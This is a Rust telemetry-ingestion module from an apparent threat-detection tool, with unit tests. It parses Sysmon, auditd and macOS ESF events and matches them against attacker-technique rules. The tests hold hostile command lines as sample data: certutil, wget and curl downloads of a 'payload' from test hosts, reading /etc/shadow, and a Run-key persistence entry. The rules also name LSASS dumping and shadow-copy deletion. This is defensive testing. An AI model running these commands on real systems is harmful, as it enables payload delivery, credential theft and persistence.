use std::collections::HashMap;
use std::sync::Arc;
use serde_json::Value;
use crate::model::SideEffect;
use crate::parser::{self, Command};
#[derive(Debug, Clone, Copy, PartialEq, Eq, clap::ValueEnum)]
pub enum Format {
Sysmon,
Auditd,
Esf,
}
#[derive(Debug, Clone)]
pub struct Observation {
pub record: usize,
pub commands: Vec<Command>,
pub raw: String,
pub event: Arc<HashMap<String, String>>,
pub side_effects: Vec<SideEffect>,
}
#[derive(Debug, Clone)]
pub struct Ingest {
pub observations: Vec<Observation>,
pub skipped: usize,
pub event_observations: Vec<EventObservation>,
}
#[derive(Debug, Clone)]
pub struct EventObservation {
pub record: usize,
pub class: String,
pub detail: String,
pub event: Arc<HashMap<String, String>>,
}
pub type UserMap = HashMap<String, String>;
#[allow(dead_code)]
pub fn parse(text: &str, format: Format) -> Result<Ingest, String> {
parse_with_users(text, format, &UserMap::new())
}
pub fn parse_with_users(text: &str, format: Format, users: &UserMap) -> Result<Ingest, String> {
match format {
Format::Sysmon => parse_sysmon(text),
Format::Auditd => parse_auditd(text, users),
Format::Esf => parse_esf(text),
}
}
pub fn parse_passwd(text: &str) -> UserMap {
let mut map = UserMap::new();
for line in text.lines() {
let fields: Vec<&str> = line.split(':').collect();
if fields.len() >= 3 && !fields[0].is_empty() && !fields[2].is_empty() {
map.insert(fields[2].to_string(), fields[0].to_string());
}
}
map
}
fn parse_sysmon(text: &str) -> Result<Ingest, String> {
let events = read_events(text)?;
let mut observations: Vec<Observation> = Vec::new();
let mut event_observations: Vec<EventObservation> = Vec::new();
let mut latest_by_pid: HashMap<String, usize> = HashMap::new();
let mut skipped = 0;
for (i, ev) in events.iter().enumerate() {
let fields = flatten_fields(ev);
match reduce_process_create(&fields) {
Some((commands, raw)) => {
if let Some(p) = fields.get("ProcessId") {
latest_by_pid.insert(p.clone(), observations.len());
}
observations.push(Observation {
record: i + 1,
commands,
raw,
event: Arc::new(fields),
side_effects: Vec::new(),
});
}
None => {
skipped += 1;
if let Some((class, detail)) = sysmon_event(&fields) {
match fields.get("ProcessId").and_then(|p| latest_by_pid.get(p)) {
Some(&idx) => observations[idx]
.side_effects
.push(SideEffect { class, detail }),
None => event_observations.push(EventObservation {
record: i + 1,
class,
detail,
event: Arc::new(fields),
}),
}
}
}
}
}
Ok(Ingest {
observations,
skipped,
event_observations,
})
}
fn sysmon_event(fields: &HashMap<String, String>) -> Option<(String, String)> {
let get = |k: &str| fields.get(k).map(String::as_str).filter(|v| !v.is_empty());
let (class, detail) = match fields.get("EventID").map(String::as_str) {
Some("3") => {
let host = get("DestinationIp").or_else(|| get("DestinationHostname"))?;
let detail = match get("DestinationPort") {
Some(port) => format!("network connection to {host}:{port}"),
None => format!("network connection to {host}"),
};
("network", detail)
}
Some("11") => ("file", format!("file created {}", get("TargetFilename")?)),
Some("13") => ("registry", format!("registry set {}", get("TargetObject")?)),
_ => return None,
};
Some((class.to_string(), detail))
}
const SYSMON_FIELDS: &[&str] = &[
"EventID",
"Image",
"CommandLine",
"OriginalFileName",
"CurrentDirectory",
"User",
"IntegrityLevel",
"Hashes",
"Company",
"Description",
"Product",
"FileVersion",
"ParentImage",
"ParentCommandLine",
"ParentUser",
"ParentProcessId",
"ProcessId",
"LogonId",
"TerminalSessionId",
"DestinationIp",
"DestinationPort",
"DestinationHostname",
"TargetFilename",
"TargetObject",
"EventType",
];
fn canonical_field(key: &str) -> String {
if key.eq_ignore_ascii_case("event_id") {
return "EventID".to_string();
}
SYSMON_FIELDS
.iter()
.find(|f| key.eq_ignore_ascii_case(f))
.map(|f| f.to_string())
.unwrap_or_else(|| key.to_string())
}
fn read_events(text: &str) -> Result<Vec<Value>, String> {
let trimmed = text.trim_start();
if trimmed.starts_with('[') {
let v: Value =
serde_json::from_str(text).map_err(|e| format!("invalid JSON array: {e}"))?;
return match v {
Value::Array(items) => Ok(items),
_ => Err("expected a JSON array of events".to_string()),
};
}
if trimmed.starts_with('{')
&& let Ok(v) = serde_json::from_str::<Value>(text)
{
return Ok(vec![v]);
}
let mut out = Vec::new();
for (n, line) in text.lines().enumerate() {
let l = line.trim();
if l.is_empty() {
continue;
}
let v: Value =
serde_json::from_str(l).map_err(|e| format!("invalid JSON on line {}: {e}", n + 1))?;
out.push(v);
}
if out.is_empty() {
return Err("no telemetry records found".to_string());
}
Ok(out)
}
fn flatten_fields(ev: &Value) -> HashMap<String, String> {
let mut out = HashMap::new();
collect_scalars(ev, &mut out, 0);
out
}
fn collect_scalars(v: &Value, out: &mut HashMap<String, String>, depth: usize) {
if depth > 4 {
return;
}
let Some(map) = v.as_object() else { return };
for (k, val) in map {
if let Some(s) = value_scalar(val) {
out.entry(canonical_field(k)).or_insert(s);
}
}
for val in map.values() {
match val {
Value::Object(_) => collect_scalars(val, out, depth + 1),
Value::Array(items) => {
for item in items {
let obj = item.as_object();
let name = obj
.and_then(|o| o.get("@Name").or_else(|| o.get("Name")))
.and_then(Value::as_str);
let text = obj.and_then(|o| o.get("#text").or_else(|| o.get("text")));
match (name, text) {
(Some(name), Some(text)) => {
if let Some(s) = value_scalar(text) {
out.entry(canonical_field(name)).or_insert(s);
}
}
_ => collect_scalars(item, out, depth + 1),
}
}
}
_ => {}
}
}
}
fn value_scalar(v: &Value) -> Option<String> {
match v {
Value::String(s) => Some(s.clone()),
Value::Number(n) => Some(n.to_string()),
Value::Bool(b) => Some(b.to_string()),
_ => None,
}
}
fn reduce_process_create(fields: &HashMap<String, String>) -> Option<(Vec<Command>, String)> {
let event_id = fields.get("EventID");
let command_line = fields.get("CommandLine").map(String::as_str).unwrap_or("");
let is_process_create = match event_id {
Some(id) => id.trim() == "1",
None => !command_line.trim().is_empty(),
};
if !is_process_create {
return None;
}
execution_from_fields(fields)
}
fn execution_from_fields(fields: &HashMap<String, String>) -> Option<(Vec<Command>, String)> {
let command_line = fields.get("CommandLine").map(String::as_str).unwrap_or("");
let image = fields.get("Image").map(String::as_str).unwrap_or("");
let raw = if command_line.trim().is_empty() {
image.to_string()
} else {
command_line.to_string()
};
if raw.trim().is_empty() {
return None;
}
let mut commands = parser::parse_line(&raw);
if !image.trim().is_empty() {
let program = parser::basename(image);
match commands.first_mut() {
Some(first) => first.program = program,
None => commands.push(Command {
program,
args: Vec::new(),
raw: raw.clone(),
}),
}
}
Some((commands, raw))
}
struct AuditRecord {
kind: String,
event_id: String,
fields: HashMap<String, String>,
}
fn parse_auditd(text: &str, users: &UserMap) -> Result<Ingest, String> {
let mut order: Vec<String> = Vec::new();
let mut groups: HashMap<String, Vec<AuditRecord>> = HashMap::new();
for line in text.lines() {
if let Some(rec) = parse_audit_record(line) {
if !groups.contains_key(&rec.event_id) {
order.push(rec.event_id.clone());
}
groups.entry(rec.event_id.clone()).or_default().push(rec);
}
}
if order.is_empty() {
return Err("no auditd records found".to_string());
}
let mut observations = Vec::new();
let mut skipped = 0;
for (idx, id) in order.iter().enumerate() {
let recs = &groups[id];
let execve = recs.iter().find(|r| r.kind == "EXECVE");
let Some(execve) = execve else {
skipped += 1;
continue;
};
let mut fields = HashMap::new();
let cmdline = build_execve_cmdline(&execve.fields);
if !cmdline.is_empty() {
fields.insert("CommandLine".to_string(), cmdline);
}
if let Some(syscall) = recs.iter().find(|r| r.kind == "SYSCALL") {
if let Some(uid) = syscall.fields.get("uid")
&& let Some(name) = users.get(uid)
{
fields.insert("User".to_string(), name.clone());
}
if let Some(exe) = syscall.fields.get("exe") {
let exe = decode_value(exe);
if !exe.is_empty() {
fields.insert("Image".to_string(), exe);
}
}
for (src, dst) in [("tty", "tty"), ("key", "key")] {
if let Some(v) = syscall.fields.get(src) {
let v = decode_value(v);
if !v.is_empty() && v != "(none)" {
fields.insert(dst.to_string(), v);
}
}
}
}
if let Some(cwd) = recs.iter().find(|r| r.kind == "CWD")
&& let Some(dir) = cwd.fields.get("cwd")
{
let dir = decode_value(dir);
if !dir.is_empty() {
fields.insert("CurrentDirectory".to_string(), dir);
}
}
match execution_from_fields(&fields) {
Some((commands, raw)) => observations.push(Observation {
record: idx + 1,
commands,
raw,
event: Arc::new(fields),
side_effects: Vec::new(),
}),
None => skipped += 1,
}
}
Ok(Ingest {
observations,
skipped,
event_observations: Vec::new(),
})
}
fn parse_audit_record(line: &str) -> Option<AuditRecord> {
let fields = parse_kv(line);
let kind = fields.get("type").map(|v| decode_value(v))?;
let event_id = fields.get("msg").and_then(|m| event_id_from_msg(m))?;
Some(AuditRecord {
kind,
event_id,
fields,
})
}
fn event_id_from_msg(msg: &str) -> Option<String> {
let start = msg.find("audit(")? + "audit(".len();
let end = msg[start..].find(')')? + start;
Some(msg[start..end].to_string())
}
fn build_execve_cmdline(fields: &HashMap<String, String>) -> String {
let mut args = Vec::new();
let mut i = 0;
while let Some(v) = fields.get(&format!("a{i}")) {
args.push(shell_quote_arg(&decode_value(v)));
i += 1;
}
args.join(" ")
}
fn shell_quote_arg(arg: &str) -> String {
let is_bare = !arg.is_empty()
&& arg.bytes().all(|b| {
b.is_ascii_alphanumeric()
|| matches!(
b,
b'-' | b'_' | b'.' | b'/' | b':' | b'=' | b'@' | b',' | b'+' | b'%'
)
});
if is_bare {
return arg.to_string();
}
if !arg.contains('"') {
format!("\"{arg}\"")
} else {
format!("'{arg}'")
}
}
fn decode_value(v: &str) -> String {
let v = v.trim();
if v.len() >= 2 && v.starts_with('"') && v.ends_with('"') {
return v[1..v.len() - 1].to_string();
}
if v.len() >= 2
&& v.len().is_multiple_of(2)
&& v.bytes().all(|b| b.is_ascii_hexdigit())
&& let Some(decoded) = hex_decode(v)
{
return decoded;
}
v.to_string()
}
fn hex_decode(s: &str) -> Option<String> {
let bytes: Option<Vec<u8>> = (0..s.len())
.step_by(2)
.map(|i| u8::from_str_radix(&s[i..i + 2], 16).ok())
.collect();
let mut bytes = bytes?;
while bytes.last() == Some(&0) {
bytes.pop();
}
String::from_utf8(bytes).ok()
}
fn parse_kv(s: &str) -> HashMap<String, String> {
let mut out = HashMap::new();
let bytes = s.as_bytes();
let mut i = 0;
while i < bytes.len() {
while i < bytes.len() && bytes[i] == b' ' {
i += 1;
}
if i >= bytes.len() {
break;
}
let key_start = i;
while i < bytes.len() && bytes[i] != b'=' && bytes[i] != b' ' {
i += 1;
}
if i >= bytes.len() || bytes[i] != b'=' {
while i < bytes.len() && bytes[i] != b' ' {
i += 1;
}
continue;
}
let key = &s[key_start..i];
i += 1; let val_start = i;
let val_end = if i < bytes.len() && bytes[i] == b'"' {
i += 1;
while i < bytes.len() && bytes[i] != b'"' {
i += 1;
}
if i < bytes.len() {
i += 1; }
i
} else {
while i < bytes.len() && bytes[i] != b' ' {
i += 1;
}
i
};
out.insert(key.to_string(), s[val_start..val_end].to_string());
}
out
}
fn parse_esf(text: &str) -> Result<Ingest, String> {
let events = read_events(text)?;
let mut observations = Vec::new();
let mut skipped = 0;
for (i, ev) in events.iter().enumerate() {
match reduce_esf(ev) {
Some(fields) => match execution_from_fields(&fields) {
Some((commands, raw)) => observations.push(Observation {
record: i + 1,
commands,
raw,
event: Arc::new(fields),
side_effects: Vec::new(),
}),
None => skipped += 1,
},
None => skipped += 1,
}
}
Ok(Ingest {
observations,
skipped,
event_observations: Vec::new(),
})
}
fn reduce_esf(ev: &Value) -> Option<HashMap<String, String>> {
let exec = ev.get("event")?.get("exec")?;
if !exec.is_object() {
return None;
}
let mut fields = HashMap::new();
if let Some(image) = nested_str(exec, &["target", "executable", "path"]) {
insert_nonempty(&mut fields, "Image", image);
}
let cmdline = join_json_args(exec.get("args"));
if !cmdline.is_empty() {
fields.insert("CommandLine".to_string(), cmdline);
}
if let Some(cwd) = nested_str(exec, &["cwd", "path"]) {
insert_nonempty(&mut fields, "CurrentDirectory", cwd);
}
if let Some(parent) = nested_str(ev, &["process", "executable", "path"]) {
insert_nonempty(&mut fields, "ParentImage", parent);
}
if let Some(target) = exec.get("target") {
if let Some(signing_id) = target.get("signing_id").and_then(Value::as_str) {
insert_nonempty(&mut fields, "signing_id", signing_id);
}
if let Some(team_id) = target.get("team_id").and_then(Value::as_str) {
insert_nonempty(&mut fields, "team_id", team_id);
}
if let Some(platform) = target.get("is_platform_binary").and_then(Value::as_bool) {
fields.insert("is_platform_binary".to_string(), platform.to_string());
}
}
Some(fields)
}
fn join_json_args(args: Option<&Value>) -> String {
let Some(items) = args.and_then(Value::as_array) else {
return String::new();
};
items
.iter()
.filter_map(Value::as_str)
.map(shell_quote_arg)
.collect::<Vec<_>>()
.join(" ")
}
fn nested_str<'a>(v: &'a Value, path: &[&str]) -> Option<&'a str> {
let mut cur = v;
for key in path {
cur = cur.get(key)?;
}
cur.as_str()
}
fn insert_nonempty(fields: &mut HashMap<String, String>, key: &str, value: &str) {
if !value.is_empty() {
fields.insert(key.to_string(), value.to_string());
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::analyzer;
use crate::kb;
use crate::model::KnowledgeBase;
use std::path::PathBuf;
fn fixture(name: &str) -> String {
let path = PathBuf::from(env!("CARGO_MANIFEST_DIR"))
.join("tests/fixtures/telemetry")
.join(name);
std::fs::read_to_string(&path).unwrap_or_else(|e| panic!("read {}: {e}", path.display()))
}
fn win_kb() -> KnowledgeBase {
kb::load(kb::Platform::WindowsSysmon).expect("windows KB must parse")
}
fn lnx_kb() -> KnowledgeBase {
kb::load(kb::Platform::LinuxAuditd).expect("linux KB must parse")
}
fn mac_kb() -> KnowledgeBase {
kb::load(kb::Platform::MacosEs).expect("macos KB must parse")
}
fn ids(report: &crate::model::Report) -> Vec<String> {
report.findings.iter().map(|f| f.rule_id.clone()).collect()
}
#[test]
fn ingests_sysmon_array_and_skips_non_process_events() {
let ingest = parse(&fixture("sysmon-eid1.json"), Format::Sysmon).expect("parses");
assert_eq!(ingest.observations.len(), 3);
assert_eq!(ingest.skipped, 1);
assert_eq!(
ingest
.observations
.iter()
.map(|o| o.record)
.collect::<Vec<_>>(),
vec![1, 2, 3]
);
}
#[test]
fn analyzes_ingested_sysmon_events_via_the_existing_matcher() {
let ingest = parse(&fixture("sysmon-eid1.json"), Format::Sysmon).expect("parses");
let report = analyzer::analyze_telemetry(&ingest, &win_kb());
let ids = ids(&report);
assert!(ids.contains(&"certutil-download".to_string()));
assert!(ids.contains(&"lsass-comsvcs".to_string()));
let certutil = report
.findings
.iter()
.find(|f| f.rule_id == "certutil-download")
.unwrap();
assert_eq!(certutil.line, 1);
}
fn event_kb() -> KnowledgeBase {
let json = r#"{
"platform": "windows-sysmon",
"entries": [{
"id": "registry-run-key-persistence",
"match": { "event": { "class": "registry", "field": "TargetObject",
"contains": "\\CurrentVersion\\Run" } },
"description": "Autorun value set under a Run key",
"techniques": [{"id": "T1547.001", "name": "Registry Run Keys / Startup Folder"}],
"telemetry": ["Sysmon EID 13 (registry value set) under a Run key"],
"noise": 60
}]
}"#;
let kb: KnowledgeBase = serde_json::from_str(json).expect("test KB parses");
kb.validate().expect("test KB valid");
kb
}
#[test]
fn standalone_registry_event_matches_the_event_axis() {
let sysmon = r#"[{"EventID":13,"ProcessId":"7777",
"TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"}]"#;
let ingest = parse(sysmon, Format::Sysmon).expect("parses");
assert!(ingest.observations.is_empty());
assert_eq!(ingest.event_observations.len(), 1);
assert_eq!(ingest.event_observations[0].class, "registry");
let report = analyzer::analyze_telemetry(&ingest, &event_kb());
let f = report
.findings
.iter()
.find(|f| f.rule_id == "registry-run-key-persistence")
.expect("standalone registry finding");
assert_eq!(f.techniques[0].id, "T1547.001");
assert!(
f.observed_side_effects
.iter()
.any(|se| se.class == "registry" && se.detail.contains("registry set"))
);
}
#[test]
fn correlated_registry_event_is_not_also_matched_standalone() {
let sysmon = r#"[
{"EventID":1,"ProcessId":"5555","Image":"C:\\Windows\\System32\\reg.exe","CommandLine":"reg add x"},
{"EventID":13,"ProcessId":"5555","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\x"}
]"#;
let ingest = parse(sysmon, Format::Sysmon).expect("parses");
assert_eq!(ingest.observations.len(), 1);
assert_eq!(ingest.observations[0].side_effects.len(), 1);
assert!(ingest.event_observations.is_empty());
}
#[test]
fn image_is_authoritative_for_the_program_basename() {
let ev = r#"{"EventID":1,"Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil -urlcache -f http://x/a a"}"#;
let ingest = parse(ev, Format::Sysmon).expect("parses");
assert_eq!(ingest.observations.len(), 1);
assert_eq!(ingest.observations[0].commands[0].program, "certutil");
}
#[test]
fn ingests_jsonl_with_nested_event_data() {
let ingest = parse(&fixture("sysmon-eid1.jsonl"), Format::Sysmon).expect("parses");
assert_eq!(ingest.observations.len(), 2);
assert_eq!(ingest.skipped, 0);
let report = analyzer::analyze_telemetry(&ingest, &win_kb());
let ids = ids(&report);
assert!(ids.contains(&"vssadmin-delete".to_string()));
assert!(ids.contains(&"net-user".to_string()));
}
#[test]
fn sysmon_correlates_network_and_file_side_effects() {
let ingest =
parse(&fixture("sysmon-with-side-effects.json"), Format::Sysmon).expect("parses");
assert_eq!(ingest.observations.len(), 1);
assert_eq!(ingest.skipped, 3);
let effects = &ingest.observations[0].side_effects;
assert_eq!(effects.len(), 2);
assert!(
effects
.iter()
.any(|e| e.class == "network" && e.detail == "network connection to 192.0.2.10:443")
);
assert!(
effects
.iter()
.any(|e| e.class == "file" && e.detail.contains("a.exe"))
);
}
#[test]
fn side_effects_reach_the_finding() {
let ingest =
parse(&fixture("sysmon-with-side-effects.json"), Format::Sysmon).expect("parses");
let report = analyzer::analyze_telemetry(&ingest, &win_kb());
let certutil = report
.findings
.iter()
.find(|f| f.rule_id == "certutil-download")
.expect("certutil finding");
assert_eq!(certutil.observed_side_effects.len(), 2);
}
#[test]
fn side_effects_correlate_to_the_latest_execution_of_a_reused_pid() {
let sysmon = r#"[
{"EventID":1,"ProcessId":"100","Image":"C:\\a.exe","CommandLine":"a.exe"},
{"EventID":3,"ProcessId":"100","DestinationIp":"10.0.0.1","DestinationPort":"1"},
{"EventID":1,"ProcessId":"100","Image":"C:\\b.exe","CommandLine":"b.exe"},
{"EventID":3,"ProcessId":"100","DestinationIp":"10.0.0.2","DestinationPort":"2"}
]"#;
let ingest = parse(sysmon, Format::Sysmon).expect("parses");
assert_eq!(ingest.observations.len(), 2);
assert_eq!(ingest.observations[0].side_effects.len(), 1);
assert!(
ingest.observations[0].side_effects[0]
.detail
.contains("10.0.0.1")
);
assert_eq!(ingest.observations[1].side_effects.len(), 1);
assert!(
ingest.observations[1].side_effects[0]
.detail
.contains("10.0.0.2")
);
}
#[test]
fn network_event_without_a_command_line_is_not_a_process_create() {
let mut fields = HashMap::new();
fields.insert(
"Image".to_string(),
"C:\\Windows\\System32\\svchost.exe".to_string(),
);
fields.insert("DestinationIp".to_string(), "192.0.2.1".to_string());
assert!(reduce_process_create(&fields).is_none());
}
#[test]
fn observed_mode_agrees_with_predictive_mode() {
let cmdline = "certutil.exe -urlcache -f http://x/a.exe a.exe";
let ev = format!(
r#"{{"EventID":1,"Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"{cmdline}"}}"#
);
let ingest = parse(&ev, Format::Sysmon).expect("parses");
let observed = ids(&analyzer::analyze_telemetry(&ingest, &win_kb()));
let predicted = ids(&analyzer::analyze(cmdline, &win_kb()));
let set = |v: Vec<String>| v.into_iter().collect::<std::collections::BTreeSet<_>>();
assert_eq!(set(observed), set(predicted));
}
#[test]
fn top_level_field_wins_over_a_nested_duplicate() {
let ev = r#"{
"EventData": { "Image": "C:\\nested\\reg.exe", "CommandLine": "reg query HKLM" },
"Image": "C:\\Windows\\System32\\certutil.exe",
"EventID": 1
}"#;
let value: serde_json::Value = serde_json::from_str(ev).unwrap();
let fields = flatten_fields(&value);
assert_eq!(
fields.get("Image").map(String::as_str),
Some("C:\\Windows\\System32\\certutil.exe")
);
assert_eq!(
fields.get("CommandLine").map(String::as_str),
Some("reg query HKLM")
);
}
#[test]
fn observation_carries_canonical_event_fields() {
let ev = r#"{"winlog":{"event_id":1,"event_data":{
"Image":"C:\\Windows\\System32\\certutil.exe",
"CommandLine":"certutil -urlcache -f http://x/a a",
"parentimage":"C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
"IntegrityLevel":"Medium"
}}}"#;
let ingest = parse(ev, Format::Sysmon).expect("parses");
let event = &ingest.observations[0].event;
assert_eq!(event.get("EventID").map(String::as_str), Some("1"));
assert_eq!(
event.get("ParentImage").map(String::as_str),
Some("C:\\Program Files\\Microsoft Office\\WINWORD.EXE")
);
assert_eq!(
event.get("IntegrityLevel").map(String::as_str),
Some("Medium")
);
}
#[test]
fn invalid_json_is_a_clear_error() {
assert!(parse("not json at all", Format::Sysmon).is_err());
}
#[test]
fn ingests_auditd_execve_and_skips_non_exec() {
let ingest = parse(&fixture("auditd-execve.log"), Format::Auditd).expect("parses");
assert_eq!(ingest.observations.len(), 3);
assert_eq!(ingest.skipped, 1);
assert_eq!(
ingest
.observations
.iter()
.map(|o| o.record)
.collect::<Vec<_>>(),
vec![1, 2, 4]
);
}
#[test]
fn analyzes_ingested_auditd_events_via_the_existing_matcher() {
let ingest = parse(&fixture("auditd-execve.log"), Format::Auditd).expect("parses");
let report = analyzer::analyze_telemetry(&ingest, &lnx_kb());
let ids = ids(&report);
assert!(ids.contains(&"shadow-read".to_string()));
assert!(ids.contains(&"wget".to_string()));
assert!(ids.contains(&"whoami".to_string()));
}
#[test]
fn auditd_rebuilds_argv_and_decodes_hex_and_quoted_values() {
let ingest = parse(&fixture("auditd-execve.log"), Format::Auditd).expect("parses");
let wget = &ingest.observations[1];
assert_eq!(wget.commands[0].program, "wget");
assert_eq!(wget.raw, "wget http://192.0.2.10/payload");
assert_eq!(
wget.event.get("Image").map(String::as_str),
Some("/usr/bin/wget")
);
assert_eq!(
wget.event.get("CurrentDirectory").map(String::as_str),
Some("/tmp")
);
assert!(wget.event.get("User").is_none());
}
#[test]
fn auditd_reassembles_records_out_of_order() {
let log = "\
type=EXECVE msg=audit(10.0:1): argc=2 a0=\"cat\" a1=\"/etc/shadow\"
type=SYSCALL msg=audit(99.9:2): syscall=42 exe=\"/usr/bin/ss\"
type=SYSCALL msg=audit(10.0:1): syscall=59 exe=\"/usr/bin/cat\" uid=0
";
let ingest = parse(log, Format::Auditd).expect("parses");
assert_eq!(ingest.observations.len(), 1);
assert_eq!(ingest.skipped, 1);
assert_eq!(ingest.observations[0].raw, "cat /etc/shadow");
assert_eq!(
ingest.observations[0]
.event
.get("Image")
.map(String::as_str),
Some("/usr/bin/cat")
);
}
#[test]
fn decode_value_handles_quoted_hex_and_literal() {
assert_eq!(decode_value("\"/usr/bin/cat\""), "/usr/bin/cat");
assert_eq!(decode_value("2f7573722f62696e2f6361740000"), "/usr/bin/cat");
assert_eq!(decode_value("/usr/bin/whoami"), "/usr/bin/whoami");
assert_eq!(decode_value("5678"), "Vx");
assert_eq!(decode_value("567"), "567");
}
#[test]
fn auditd_preserves_argv_boundaries_across_whitespace_and_metachars() {
let log = "\
type=SYSCALL msg=audit(1.0:1): syscall=59 exe=\"/usr/bin/grep\"
type=EXECVE msg=audit(1.0:1): argc=4 a0=\"grep\" a1=\"-r\" a2=68656c6c6f20776f726c64 a3=613b627c63
";
let ingest = parse(log, Format::Auditd).expect("parses");
let cmd = &ingest.observations[0].commands[0];
assert_eq!(cmd.program, "grep");
assert!(
cmd.args.iter().any(|a| a == "hello world"),
"expected 'hello world' as one arg, got {:?}",
cmd.args
);
assert!(
cmd.args.iter().any(|a| a == "a;b|c"),
"expected 'a;b|c' as one arg, got {:?}",
cmd.args
);
}
#[test]
fn passwd_maps_uid_to_name() {
let passwd = "root:x:0:0:root:/root:/bin/bash\n# comment\nanalyst:x:1000:1000::/home/analyst:/bin/zsh\nbad-line\n";
let map = parse_passwd(passwd);
assert_eq!(map.get("0").map(String::as_str), Some("root"));
assert_eq!(map.get("1000").map(String::as_str), Some("analyst"));
assert_eq!(map.len(), 2);
}
#[test]
fn auditd_resolves_user_only_with_a_mapping() {
let log = "\
type=SYSCALL msg=audit(1.0:1): syscall=59 exe=\"/usr/bin/whoami\" uid=0
type=EXECVE msg=audit(1.0:1): argc=1 a0=\"whoami\"
";
let bare = parse(log, Format::Auditd).expect("parses");
assert!(bare.observations[0].event.get("User").is_none());
let users = parse_passwd("root:x:0:0:::\n");
let mapped = parse_with_users(log, Format::Auditd, &users).expect("parses");
assert_eq!(
mapped.observations[0].event.get("User").map(String::as_str),
Some("root")
);
}
#[test]
fn empty_auditd_input_is_a_clear_error() {
assert!(parse("", Format::Auditd).is_err());
assert!(parse("---- \n#comment\n", Format::Auditd).is_err());
}
#[test]
fn ingests_esf_exec_and_skips_non_exec() {
let ingest = parse(&fixture("esf-exec.jsonl"), Format::Esf).expect("parses");
assert_eq!(ingest.observations.len(), 3);
assert_eq!(ingest.skipped, 1);
assert_eq!(
ingest
.observations
.iter()
.map(|o| o.record)
.collect::<Vec<_>>(),
vec![1, 2, 4]
);
}
#[test]
fn analyzes_ingested_esf_events_via_the_existing_matcher() {
let ingest = parse(&fixture("esf-exec.jsonl"), Format::Esf).expect("parses");
let report = analyzer::analyze_telemetry(&ingest, &mac_kb());
let ids = ids(&report);
assert!(ids.contains(&"curl".to_string()));
assert!(ids.contains(&"whoami".to_string()));
assert!(ids.contains(&"sw-vers".to_string()));
}
#[test]
fn esf_reduces_target_argv_and_carries_the_calling_parent() {
let ingest = parse(&fixture("esf-exec.jsonl"), Format::Esf).expect("parses");
let curl = &ingest.observations[0];
assert_eq!(curl.commands[0].program, "curl");
assert_eq!(curl.raw, "curl -s -O http://192.0.2.10/payload");
assert_eq!(
curl.event.get("Image").map(String::as_str),
Some("/usr/bin/curl")
);
assert_eq!(
curl.event.get("CurrentDirectory").map(String::as_str),
Some("/Users/analyst")
);
assert_eq!(
curl.event.get("ParentImage").map(String::as_str),
Some("/usr/bin/osascript")
);
}
#[test]
fn esf_carries_code_signing_fields() {
let ev = r#"{"event":{"exec":{"target":{
"executable":{"path":"/tmp/curl"},
"signing_id":"com.example.tool","team_id":"ABCDE12345","is_platform_binary":false},
"args":["curl","http://x/y"]}},"process":{"executable":{"path":"/bin/zsh"}}}"#;
let ingest = parse(ev, Format::Esf).expect("parses");
let event = &ingest.observations[0].event;
assert_eq!(
event.get("signing_id").map(String::as_str),
Some("com.example.tool")
);
assert_eq!(event.get("team_id").map(String::as_str), Some("ABCDE12345"));
assert_eq!(
event.get("is_platform_binary").map(String::as_str),
Some("false")
);
}
#[test]
fn auditd_carries_tty_and_key() {
let log = "\
type=SYSCALL msg=audit(1.0:1): syscall=59 exe=\"/usr/bin/whoami\" tty=pts0 key=\"recon\"
type=EXECVE msg=audit(1.0:1): argc=1 a0=\"whoami\"
";
let ingest = parse(log, Format::Auditd).expect("parses");
let event = &ingest.observations[0].event;
assert_eq!(event.get("tty").map(String::as_str), Some("pts0"));
assert_eq!(event.get("key").map(String::as_str), Some("recon"));
}
#[test]
fn auditd_omits_placeholder_tty() {
let log = "\
type=SYSCALL msg=audit(1.0:1): syscall=59 exe=\"/usr/bin/whoami\" tty=(none)
type=EXECVE msg=audit(1.0:1): argc=1 a0=\"whoami\"
";
let ingest = parse(log, Format::Auditd).expect("parses");
assert!(ingest.observations[0].event.get("tty").is_none());
}
#[test]
fn empty_esf_input_is_a_clear_error() {
assert!(parse("", Format::Esf).is_err());
let open = r#"{"event":{"open":{"file":{"path":"/x"}}}}"#;
let ingest = parse(open, Format::Esf).expect("parses");
assert_eq!(ingest.observations.len(), 0);
assert_eq!(ingest.skipped, 1);
}
}